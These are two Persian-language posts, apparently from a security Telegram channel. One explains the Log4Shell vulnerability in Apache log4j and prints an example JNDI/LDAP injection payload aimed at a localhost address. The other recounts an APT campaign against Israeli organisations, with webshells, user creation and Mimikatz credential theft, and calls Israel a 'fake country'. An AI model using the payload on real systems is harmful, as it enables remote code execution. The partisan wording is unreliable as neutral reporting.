#Log4Shell #Zero_Day Exploit #Log4j Java Library
به تازگی آسیب پذیری کشف شده از نوع روز صفر که میتونه به مهاجم قدرت اجرای کد از راه دور رو بده، این آسیب پذیری با شناسه CVE-2021-44228 برای کتابخانه Apache log4j هستش که بسیاری از سرویس های ابری مانند Apple iCloud و Steam پیدا شده و میتوانسته مورد بهره برداری قرار بگیره، از نسخه 2.0 تا 2.14.1 این آسیب پذیری وجود داره و در نسخه 2.15.0 رفع شده.

https://t.me/Unk9vvN/1309

اما این آسیب پذیری مبتنی بر پروتکل HTTP و TCP میتونه به endpoint آسیب پذیر ارسال بشه و بهره برداری صورت بگیره، این آسیب پذیری در کتابخانه ای رخ داده که مامور Log مقادیر User Agent است و مهاجم میتونه پیلود خودش رو مبتنی بر پارامتر User Agent ارسال کرده و با wrapper پروتکل jndi دسترسی به ldap گرفته و ارتباطی رو مبتنی بر درگاهی ایجاد کنه.

Payload Example:

${jndi:ldap://127.0.0.1:1389/a}



https://github.com/tangxiaofeng7/apache-log4j-poc
https://issues.apache.org/jira/browse/LOG4J2-2109
@Unk9vvN
#MERCURY #Log4j Targeting #Israel Organizations
در جریان پیدا شدن آسیب پذیری log4j تیم های تهاجمی در سراسر دنیا شروع به پایش محصولاتی کردند که از کتابخونه Log 4 Java که محصول Apache هست، پیدا کنند...

یکی از موارد معروفی که در اثر استفاده از این کتابخانه مورد حمله قرار گرفت محصولات VMware بود، اما در تهاجمی که اخیرا بر روی ارگان های دولتی کشور جعلی اسرائیل رخ داد، محصولی مورد حمله قرار گرفت با نام SysAid که بر بستر های این کشور مورد استفاده قرار میگرفته و دارای کتابخونه آسیب پذیری Log4j بوده...

اما نکات جالبی راجب خود #APT اتفاق افتاده. اول اینکه بعد از ایجاد دسترسی بواسطه آسیب پذیری، مهاجمان اقدام به اجرای کد مبتنی بر Webshell کردند و بواسطه cmd.exe و net.exe فرمان هایی رو برای ایجاد یک کاربر در localgroup انجام دادند.

مورد بعدی که جالبه، استفاده از Mimikatz برای دزدیدن Credentials بوده برای Lateral Movement و دسترسی به DC و SQL Server، همچنین به وسیله سرویسی در خود سیستم عامل که با نام vpnui.exe موجوده، یک دسترسی Remote Desktop Management بواسطه محصولی تجاری زده شده با نام eHorus !

@Unk9vvN